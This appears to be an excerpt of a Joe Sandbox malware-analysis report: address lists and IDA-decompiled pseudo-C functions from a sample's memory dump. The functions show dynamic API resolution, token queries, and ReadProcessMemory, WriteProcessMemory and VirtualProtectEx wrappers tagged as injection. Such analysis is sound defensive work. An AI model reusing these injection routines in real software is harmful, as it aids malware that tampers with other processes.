    0x003b24f8
    0x003b24f8
    0x003b2502
    0x003b2505
    0x003b2509
    0x003b2509
    0x003b250f
    0x003b2515
    0x003b2517
    0x003b251c
    0x003b2522
    0x003b2524
    0x003b252a
    0x003b252a
    0x003b2524
    0x003b2530
    0x003b2535
    0x003b2537
    0x003b2602
    0x003b2602
    0x003b2609
    0x00000000
    0x003b253d
    0x003b253d
    0x003b253f
    0x003b253f
    0x003b2542
    0x003b2545
    0x003b2549
    0x00000000
    0x00000000
    0x003b254b
    0x003b254e
    0x003b2555
    0x003b2555
    0x003b2555
    0x003b2558
    0x003b255b
    0x00000000
    0x00000000
    0x003b255d
    0x003b2561
    0x00000000
    0x00000000
    0x003b2564
    0x003b2565
    0x003b2565
    0x003b256a
    0x003b256e
    0x003b2578
    0x003b2570
    0x003b2570
    0x003b2570
    0x003b2579
    0x003b257a
    0x003b257b
    0x003b257c
    0x003b2581
    0x003b2586
    0x003b258b
    0x003b2591
    0x003b25df
    0x003b25e5
    0x003b25e7
    0x003b25e7
    0x003b25ed
    0x003b25f4
    0x003b260e
    0x003b2613
    0x003b2593
    0x003b2594
    0x00000000
    0x003b2594
    0x003b2591
    0x003b2550
    0x003b2553
    0x00000000
    0x00000000
    0x00000000
    0x003b259a
    0x003b259a
    0x003b259e
    0x003b25a2
    0x003b25a5
    0x003b25a5
    0x003b25a8
    0x003b25a8
    0x003b25ac
    0x003b25ac
    0x003b253f
    0x003b2537
    0x00000000

    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00393DD0, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 27
    C-Code - Quality: 93%
    			E00393DD0(void* __eax) {
				void* _t2;
				void* _t4;
				int _t5;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x208);
				L0039A47E();
				_t5 = __eax;
				_t8 = _t7 + 4;
				_t9 = __eax;
				if(__eax == 0) {
					 *0x3b8628 = 0;
				} else {
					memset(__eax, 0, 0x208);
					_t8 = _t8 + 0xc;
					 *0x3b8628 = _t5;
				}
				_t6 = 0x3b8048;
				_t4 = 8;
				do {
					_t2 = E0039F250(_t9, _t6); // executed
					_t8 = _t8 + 4;
					_t6 = _t6 + 0x10;
					_t4 = _t4 - 1;
				} while (_t4 != 0);
				return _t2;
			}









    0x00393dd2
    0x00393dd7
    0x00393ddc
    0x00393dde
    0x00393de1
    0x00393de3
    0x00393dfd
    0x00393de5
    0x00393ded
    0x00393df2
    0x00393df5
    0x00393df5
    0x00393e07
    0x00393e0c
    0x00393e11
    0x00393e12
    0x00393e17
    0x00393e1a
    0x00393e1d
    0x00393e1d
    0x00393e22

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 00393DD7
    • memset.MSVCRT ref: 00393DED
      • Part of subcall function 0039F250: LoadLibraryW.KERNEL32(?), ref: 0039F278
      • Part of subcall function 0039F250: GetProcAddress.KERNEL32(00393E17,?), ref: 0039F2AD
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00392E90, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147
    C-Code - Quality: 94%
    			E00392E90(void* __ecx, intOrPtr _a4, char _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v36;
				char _v236;
				char _v364;
				short _v888;
				char _v1412;
				char _v1936;
				char _v2960;
				void* __ebx;
				void* __edi;
				void* _t45;
				char _t46;
				void* _t55;
				void* _t58;
				void* _t62;
				long _t64;
				void* _t67;
				void* _t69;
				intOrPtr _t90;
				void* _t103;
				void* _t104;
				void* _t105;

				_t103 = __ecx;
				_t71 = 0;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v20 = 0;
				E0039E520( &_v36);
				_t45 = E00397E20(_a8, 0,  &_v12, 0xffffffff);
				_t105 = _t104 + 0x10;
				_t107 = _t45;
				if(_t45 == 0) {
					L10:
					_t46 = _v8;
					L11:
					if(_t46 != 0) {
						E0039BB40(_t46);
						_t105 = _t105 + 4;
					}
					L13:
					_t47 = _v12;
					if(_v12 != 0) {
						E0039BB40(_t47);
					}
					E00397AD0( &_v36);
					return _t71;
				}
				E00399090(_t107,  &_v236, 0x71);
				_t90 =  *0x3b8628; // 0x593938
				_t105 = _t105 + 8;
				_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t90 + 0x10))))( &_v236, 0x105,  &_v1412, 0);
				_t108 = _t55;
				if(_t55 == 0) {
					goto L10;
				}
				E00399090(_t108,  &_v236, 0x72);
				_t13 = _t103 + 0x10; // 0xa06850ff
				_push( *_t13);
				_t58 = E003A0C10( &_v1936, 0x105,  &_v236,  &_v1412);
				_t105 = _t105 + 0x1c;
				_t109 = _t58;
				if(_t58 < 0) {
					goto L10;
				}
				E00399090(_t109,  &_v236, 0x73);
				_push(_a4);
				_t62 = E003A0C10( &_v888, 0x105,  &_v236,  &_v1936);
				_t105 = _t105 + 0x1c;
				if(_t62 < 0) {
					goto L10;
				}
				_t64 = GetFileAttributesW( &_v888); // executed
				if(_t64 == 0xffffffff) {
					goto L10;
				}
				_t25 = _t103 + 0x44; // 0x89c933ff
				_t67 = E00395F40( &_v36,  *((intOrPtr*)( *((intOrPtr*)( *_t25 + 8)))),  &_v888,  &_v8,  &_v16); // executed
				if(_t67 == 0) {
					goto L10;
				}
				_t46 = _v8;
				if(_t46 == 0) {
					goto L13;
				}
				_t85 = _v16;
				if(_v16 > 0x800000) {
					goto L11;
				} else {
					_push(0);
					_t36 = _t103 + 0x40; // 0xfffa4885
					_t69 = E003A0500(_t103, 0,  *_t36, _v12, _t46, _t85,  &_v2960,  &_v20,  &_a8,  &_v364); // executed
					if(_t69 != 0) {
						E00397AF0(0, _t103, _v20);
						_t71 = 1;
					}
					goto L10;
				}
			}




























    0x00392e9e
    0x00392ea3
    0x00392ea5
    0x00392ea8
    0x00392eab
    0x00392eae
    0x00392eb1
    0x00392ec1
    0x00392ec6
    0x00392ec9
    0x00392ecb
    0x0039300a
    0x0039300a
    0x0039300d
    0x0039300f
    0x00393012
    0x00393017
    0x00393017
    0x0039301a
    0x0039301a
    0x0039301f
    0x00393022
    0x00393027
    0x0039302d
    0x0039303a
    0x0039303a
    0x00392eda
    0x00392edf
    0x00392ee5
    0x00392eff
    0x00392f01
    0x00392f03
    0x00000000
    0x00000000
    0x00392f12
    0x00392f17
    0x00392f1a
    0x00392f35
    0x00392f3a
    0x00392f3d
    0x00392f3f
    0x00000000
    0x00000000
    0x00392f4e
    0x00392f56
    0x00392f71
    0x00392f76
    0x00392f7b
    0x00000000
    0x00000000
    0x00392f93
    0x00392f98
    0x00000000
    0x00000000
    0x00392f9e
    0x00392fb5
    0x00392fbc
    0x00000000
    0x00000000
    0x00392fbe
    0x00392fc3
    0x00000000
    0x00000000
    0x00392fc5
    0x00392fce
    0x00000000
    0x00392fd0
    0x00392fd0
    0x00392fe8
    0x00392ff3
    0x00392ffa
    0x00393002
    0x00393007
    0x00393007
    0x00000000
    0x00392ffa

    APIs
      • Part of subcall function 0039E520: CoCreateInstance.OLE32(003B32CC,00000000,00000001,003B32DC,00000000,00396A37,?,00000000), ref: 0039E55C
    • GetFileAttributesW.KERNELBASE(?), ref: 00392F93
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 003A0C10: _vsnwprintf.MSVCRT ref: 003A0C42
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00396D30, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 85
    C-Code - Quality: 40%
    			E00396D30() {
				char _v8;
				long _v12;
				long _v16;
				short _v20;
				char _v24;
				void _v100;
				intOrPtr _t23;
				intOrPtr _t27;
				void* _t28;
				int _t34;
				intOrPtr _t38;
				intOrPtr _t42;
				intOrPtr _t50;
				intOrPtr _t53;
				void* _t55;

				_t23 =  *0x3b8628; // 0x593938
				_v12 = 0;
				_v16 = 0;
				_v24 = 0;
				_v20 = 0x500;
				_v8 = 0;
				_t55 = 0;
				_t8 = _t23 + 0x150; // 0x593a88
				_push( *((intOrPtr*)( *((intOrPtr*)(_t23 + 0x100))))(8,  &_v12));
				if( *((intOrPtr*)( *_t8))() != 0) {
					_t34 = GetTokenInformation(_v12, 1,  &_v100, 0x4c,  &_v16); // executed
					if(_t34 != 0) {
						_t53 =  *0x3b8628; // 0x593938
						_push( &_v8);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0x12);
						_push(1);
						_push( &_v24);
						if( *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x158))))() != 0) {
							_t38 =  *0x3b8628; // 0x593938
							_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t38 + 0x14c))))(_v100, _v8);
						}
					}
				}
				_t27 = _v8;
				if(_t27 != 0) {
					_t50 =  *0x3b8628; // 0x593938
					 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x154))))(_t27);
				}
				_t28 = _v12;
				if(_t28 != 0) {
					_t42 =  *0x3b8628; // 0x593938
					 *((intOrPtr*)( *((intOrPtr*)(_t42 + 0xf8))))(_t28);
				}
				return _t55;
			}


















    0x00396d36
    0x00396d44
    0x00396d47
    0x00396d4a
    0x00396d4d
    0x00396d53
    0x00396d5e
    0x00396d60
    0x00396d68
    0x00396d6f
    0x00396d8d
    0x00396d91
    0x00396d93
    0x00396d9c
    0x00396da3
    0x00396da4
    0x00396da5
    0x00396da6
    0x00396da7
    0x00396da8
    0x00396da9
    0x00396daa
    0x00396dac
    0x00396db1
    0x00396db6
    0x00396dbe
    0x00396dcd
    0x00396dcd
    0x00396db6
    0x00396d91
    0x00396dcf
    0x00396dd4
    0x00396dd6
    0x00396de3
    0x00396de3
    0x00396de5
    0x00396dea
    0x00396dec
    0x00396df9
    0x00396df9
    0x00396e03

    APIs
    • GetTokenInformation.KERNELBASE(?,00000001,?,0000004C,?), ref: 00396D8D
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003917D0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 85library
    C-Code - Quality: 95%
    			E003917D0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v112;
				char _v312;
				void* _t30;
				intOrPtr _t31;
				void* _t32;
				void* _t35;
				intOrPtr _t43;
				void* _t57;
				void* _t59;
				void* _t61;
				void* _t62;

				_t59 = __ecx;
				_v8 = 0;
				_v12 = 0;
				E00399090(__eflags,  &_v312, 0x6c);
				E00396CB0( &_v112, 0x95);
				_t43 =  *0x3b8628; // 0x593938
				_t62 = _t61 + 0x10;
				_t39 = GetProcAddress( *((intOrPtr*)( *((intOrPtr*)(_t43 + 0x24))))( &_v112, __edi, __esi, __ebx),  &_v312);
				if(_t25 != 0) {
					_t30 = E00391170(_a4, 0,  &_v8, 0xffffffff);
					_t62 = _t62 + 0x10;
					if(_t30 != 0) {
						_t31 =  *0x3b8628; // 0x593938
						_t32 =  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc))))(_v8);
						_t15 = _t59 + 0x5c; // 0x8b000000
						_t35 = E003926F0(_t59,  *_t15, _v8, _t32 + _t32 + 2); // executed
						_t57 = _t35;
						_t67 = _t57;
						if(_t57 != 0) {
							_push(_t57);
							E003A0780(_t39, _t67, _t59, _t39, 1,  &_v12);
							_t17 = _t59 + 0x5c; // 0x8b000000
							_t62 = _t62 + 0x14;
							E00391140( *_t17, _t57, 0, 0x8000); // executed
						}
					}
				}
				_t26 = _v8;
				if(_v8 != 0) {
					E0039BB40(_t26);
				}
				return _v12;
			}
















    0x003917e7
    0x003917e9
    0x003917ec
    0x003917ef
    0x003917fd
    0x00391802
    0x00391808
    0x00391822
    0x00391826
    0x00391833
    0x00391838
    0x0039183d
    0x00391842
    0x0039184b
    0x00391855
    0x0039185c
    0x00391861
    0x00391863
    0x00391865
    0x00391867
    0x00391870
    0x00391875
    0x00391878
    0x00391886
    0x00391886
    0x00391865
    0x0039183d
    0x0039188b
    0x00391893
    0x00391896
    0x0039189b
    0x003918a4

    APIs
    • GetProcAddress.KERNEL32(00000000,?,?,0039FE81,?), ref: 0039181C
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 00391140: VirtualFreeEx.KERNELBASE(4z9,?,00000000,00000000,?,003979B2,?,?,00000000,00008000,00000000,00000000,00000000,00000000,?,00397A34), ref: 00391160
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003965F0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 78library
    C-Code - Quality: 90%
    			E003965F0(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v8;
				char _v108;
				char _v308;
				void* __ebx;
				_Unknown_base(*)()* _t20;
				intOrPtr _t26;
				void* _t27;
				void* _t29;
				intOrPtr _t33;
				void* _t42;
				void* _t44;

				_t42 = __ecx;
				_v8 = 0;
				E00399090(__eflags,  &_v308, 0x6c);
				E00396CB0( &_v108, 0x96);
				_t33 =  *0x3b8628; // 0x593938
				_t20 = GetProcAddress( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x24))))( &_v108),  &_v308);
				_t30 = _t20;
				if(_t20 == 0) {
					return _v8;
				} else {
					_t44 = _a8;
					if(_t44 >= 0x10000) {
						_t26 =  *0x3b8628; // 0x593938
						_t27 =  *((intOrPtr*)( *((intOrPtr*)(_t26 + 0x10c))))(_t44);
						_t9 = _t42 + 0x5c; // 0x8b000000
						_t29 = E003926F0(_t42,  *_t9, _t44, _t27 + 1); // executed
						_t44 = _t29;
					}
					_t53 = _t44;
					if(_t44 != 0) {
						_push(_t44);
						_push(_a4);
						E003A0780(_t30, _t53, _t42, _t30, 2,  &_v8); // executed
						if(_t44 >= 0x10000) {
							_t12 = _t42 + 0x5c; // 0x8b000000
							E00391140( *_t12, _t44, 0, 0x8000); // executed
						}
					}
					return _v8;
				}
			}














    0x00396604
    0x00396606
    0x0039660d
    0x0039661b
    0x00396620
    0x0039663a
    0x00396640
    0x00396644
    0x003966b8
    0x00396646
    0x00396647
    0x00396650
    0x00396652
    0x0039665e
    0x00396660
    0x00396669
    0x0039666e
    0x0039666e
    0x00396670
    0x00396672
    0x00396677
    0x00396678
    0x00396681
    0x0039668f
    0x00396691
    0x0039669f
    0x0039669f
    0x0039668f
    0x003966ad
    0x003966ad

    APIs
    • GetProcAddress.KERNEL32(00000000,?,?,00000000,0039C9A1), ref: 0039663A
      • Part of subcall function 00391140: VirtualFreeEx.KERNELBASE(4z9,?,00000000,00000000,?,003979B2,?,?,00000000,00008000,00000000,00000000,00000000,00000000,?,00397A34), ref: 00391160
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039ED90, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70
    C-Code - Quality: 86%
    			E0039ED90(WCHAR* _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16) {
				char _v12;
				char _v20;
				char _v28;
				void* _t18;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				char* _t34;
				intOrPtr _t35;
				void* _t37;
				long _t40;
				intOrPtr* _t42;
				intOrPtr* _t43;
				intOrPtr* _t44;
				void* _t45;
				void* _t46;

				_t46 = _t45 - 0x18;
				_t40 = 0;
				_t18 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0, 0); // executed
				_t37 = _t18;
				if(_t37 != 0xffffffff) {
					_push( &_v28);
					_t21 =  *0x3b8628; // 0x593938
					_push( &_v20);
					_t34 =  &_v12;
					_push(_t34);
					_push(_t37);
					if( *((intOrPtr*)( *((intOrPtr*)(_t21 + 0x44))))() != 0) {
						_t42 = _a8;
						_t50 = _t42;
						if(_t42 != 0) {
							_t34 =  &_v12;
							_t28 = E00391AF0(_t50, _t34);
							_t46 = _t46 + 4;
							 *_t42 = _t28;
							 *((intOrPtr*)(_t42 + 4)) = _t34;
						}
						_t43 = _a12;
						_t51 = _t43;
						if(_t43 != 0) {
							_t27 = E00391AF0(_t51,  &_v20);
							_t46 = _t46 + 4;
							 *_t43 = _t27;
							 *((intOrPtr*)(_t43 + 4)) = _t34;
						}
						_t44 = _a16;
						_t52 = _t44;
						if(_t44 != 0) {
							 *_t44 = E00391AF0(_t52,  &_v28);
							 *((intOrPtr*)(_t44 + 4)) = _t34;
						}
						_t40 = 1;
					}
					_t35 =  *0x3b8628; // 0x593938
					 *((intOrPtr*)( *((intOrPtr*)(_t35 + 0xf8))))(_t37);
				}
				return _t40;
			}



















    0x0039eda2
    0x0039eda7
    0x0039edb6
    0x0039edb8
    0x0039edbd
    0x0039edc2
    0x0039edc3
    0x0039edcb
    0x0039edcf
    0x0039edd2
    0x0039edd3
    0x0039edd8
    0x0039edda
    0x0039eddd
    0x0039eddf
    0x0039ede1
    0x0039ede5
    0x0039edea
    0x0039eded
    0x0039edef
    0x0039edef
    0x0039edf2
    0x0039edf5
    0x0039edf7
    0x0039edfd
    0x0039ee02
    0x0039ee05
    0x0039ee07
    0x0039ee07
    0x0039ee0a
    0x0039ee0d
    0x0039ee0f
    0x0039ee1d
    0x0039ee1f
    0x0039ee1f
    0x0039ee22
    0x0039ee22
    0x0039ee27
    0x0039ee34
    0x0039ee34
    0x0039ee3d

    APIs
    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,0039FE81,?,00394D1E,?,00000000,00000000,?), ref: 0039EDB6
      • Part of subcall function 00391AF0: __aulldiv.INT64 ref: 00391B04
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039F5D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37
    C-Code - Quality: 100%
    			E0039F5D0(void* __eflags, intOrPtr _a4) {
				void* __esi;
				signed char _t7;
				void* _t13;
				void* _t15;
				WCHAR* _t16;

				_t13 = 0;
				_t16 = E0039C7B0(_t15, __eflags, _a4);
				if(_t16 == 0) {
					L5:
					return _t13;
				} else {
					_t7 = GetFileAttributesW(_t16); // executed
					if(_t7 == 0xffffffff || (_t7 & 0x00000010) != 0) {
						_t13 = 0;
						__eflags = 0;
						E0039BB40(_t16);
						goto L5;
					} else {
						E0039BB40(_t16);
						return 1;
					}
				}
			}








    0x0039f5d9
    0x0039f5e0
    0x0039f5e4
    0x0039f61f
    0x0039f624
    0x0039f5e6
    0x0039f5f3
    0x0039f5f8
    0x0039f615
    0x0039f615
    0x0039f617
    0x00000000
    0x0039f5fe
    0x0039f604
    0x0039f611
    0x0039f611
    0x0039f5f8

    APIs
      • Part of subcall function 0039C7B0: GetFullPathNameW.KERNEL32(?,00000105,00000000,00000000,?,00000000), ref: 0039C828
    • GetFileAttributesW.KERNELBASE(00000000,00000000,00000001,00000000,?,00398FAF,00000000,00000000,00398A9D,00000000,00000000,00000000,00000000,?,00000001), ref: 0039F5F3
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039E850, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33com
    C-Code - Quality: 100%
    			E0039E850(intOrPtr* __ecx) {
				void* _t4;
				intOrPtr _t8;
				intOrPtr _t13;
				intOrPtr* _t14;
				intOrPtr* _t15;

				_t15 = __ecx;
				_t14 = __ecx + 4;
				 *_t14 = 0;
				 *__ecx = 0;
				_t4 = E003936C0();
				if(_t4 != 0) {
					_t13 =  *0x3b8628; // 0x593938
					 *((intOrPtr*)( *((intOrPtr*)(_t13 + 0x1c4))))(0x3b638c, 0, 1, 0x3b617c, _t14); // executed
					return _t15;
				} else {
					_t8 =  *0x3b8628; // 0x593938
					 *((intOrPtr*)( *((intOrPtr*)(_t8 + 0x1c4))))(0x3b614c, _t4, 1, 0x3b612c, _t15);
					return _t15;
				}
			}








    0x0039e851
    0x0039e854
    0x0039e857
    0x0039e85d
    0x0039e863
    0x0039e86a
    0x0039e88c
    0x0039e8a7
    0x0039e8ad
    0x0039e86c
    0x0039e875
    0x0039e885
    0x0039e88b
    0x0039e88b

    APIs
    • CoCreateInstance.OLE32(003B638C,00000000,00000001,003B617C,?), ref: 0039E8A7
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00396CD0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31
    C-Code - Quality: 100%
    			E00396CD0(void* __ecx, void* _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				int _t13;
				long _t22;

				_t22 = _a16;
				_v8 = 0;
				_t13 = ReadProcessMemory(_a4, _a8, _a12, _t22,  &_v8); // executed
				if(_t13 != 0) {
					return 0 | _v8 == _t22;
				} else {
					return _t13;
				}
			}






    0x00396cdb
    0x00396cee
    0x00396cf9
    0x00396cfd
    0x00396d12
    0x00396cff
    0x00396d03
    0x00396d03

    APIs
    • ReadProcessMemory.KERNELBASE(00000000,00000070,?,?,00000000,00000000,00000000,?,0039CCD4,?,?,?,00000070,00000000), ref: 00396CF9
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00397B30, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31injection
    C-Code - Quality: 100%
    			E00397B30(void* __ecx, void* _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				int _t13;
				long _t22;

				_t22 = _a16;
				_v8 = 0;
				_t13 = WriteProcessMemory(_a4, _a8, _a12, _t22,  &_v8); // executed
				if(_t13 != 0) {
					return 0 | _v8 == _t22;
				} else {
					return _t13;
				}
			}






    0x00397b3b
    0x00397b4e
    0x00397b5c
    0x00397b60
    0x00397b75
    0x00397b62
    0x00397b66
    0x00397b66

    APIs
    • WriteProcessMemory.KERNELBASE(00000000,00000070,?,?,00000000,00000000,00000000,?,0039CCFB,?,?,?,00000070,?,?,?), ref: 00397B5C
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039D9D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20
    C-Code - Quality: 100%
    			E0039D9D0(void* __ecx, void* _a4, void* _a8, long _a12, long _a16) {
				long _v8;
				int _t11;

				_v8 = 0;
				_t11 = VirtualProtectEx(_a4, _a8, _a12, _a16,  &_v8); // executed
				return _t11;
			}





    0x0039d9ed
    0x0039d9f8
    0x0039d9fd

    APIs
    • VirtualProtectEx.KERNELBASE(0039FEDD,00000040,00002000,?,0039FE81,0039FE81,?,0039B4CC,0039C9A1,00000000,?,00000002,0039C9A1,00000000,C45D89F0,?), ref: 0039D9F8
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039B4FC, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 195
    C-Code - Quality: 85%
    			E0039B4FC(void* __esi) {
				int _t146;
				void* _t149;
				signed int _t150;
				void* _t155;
				void* _t157;
				signed int _t160;
				intOrPtr _t169;
				signed int _t171;
				signed int _t172;
				signed int _t178;
				signed int* _t188;
				int _t191;
				signed int _t192;
				intOrPtr _t196;
				signed int _t197;
				signed int _t201;
				signed int _t204;
				intOrPtr _t206;
				signed int _t207;
				intOrPtr _t208;
				signed int _t210;
				signed int* _t212;
				signed int _t213;
				void* _t214;
				int _t216;
				void* _t218;
				signed int* _t220;
				signed int _t223;
				signed int _t224;
				intOrPtr* _t227;
				intOrPtr* _t232;
				void* _t238;
				int _t239;
				void* _t240;
				intOrPtr _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				int* _t249;
				signed short* _t254;
				intOrPtr _t264;
				signed int _t265;
				signed int _t267;
				intOrPtr _t272;
				void* _t278;
				unsigned int _t284;
				unsigned short _t287;
				int _t305;
				intOrPtr _t308;
				intOrPtr* _t318;
				signed int _t319;
				signed int _t321;
				intOrPtr _t322;
				void* _t324;
				intOrPtr* _t325;
				signed int _t326;
				void* _t327;
				void* _t329;
				signed int _t330;
				void* _t331;
				void* _t333;
				void* _t335;

				_t331 = __esi;
				do {
					_t249 =  *(_t333 - 0x10);
					_t146 =  *(_t249 - 8);
					_t239 =  *_t249;
					if(_t146 > _t239) {
						_t239 = _t146;
					}
					_t4 =  *(_t333 - 0x10) - 4; // 0xffffa6cf
					_t149 =  *_t4 +  *((intOrPtr*)(_t333 - 8));
					_push(4);
					_push(0x1000);
					_push(_t239);
					_push(_t149);
					_push( *((intOrPtr*)(_t333 + 8)));
					E003A1E80(); // executed
					_t316 = _t149;
					if(_t149 == 0) {
						L78:
						_pop(_t240);
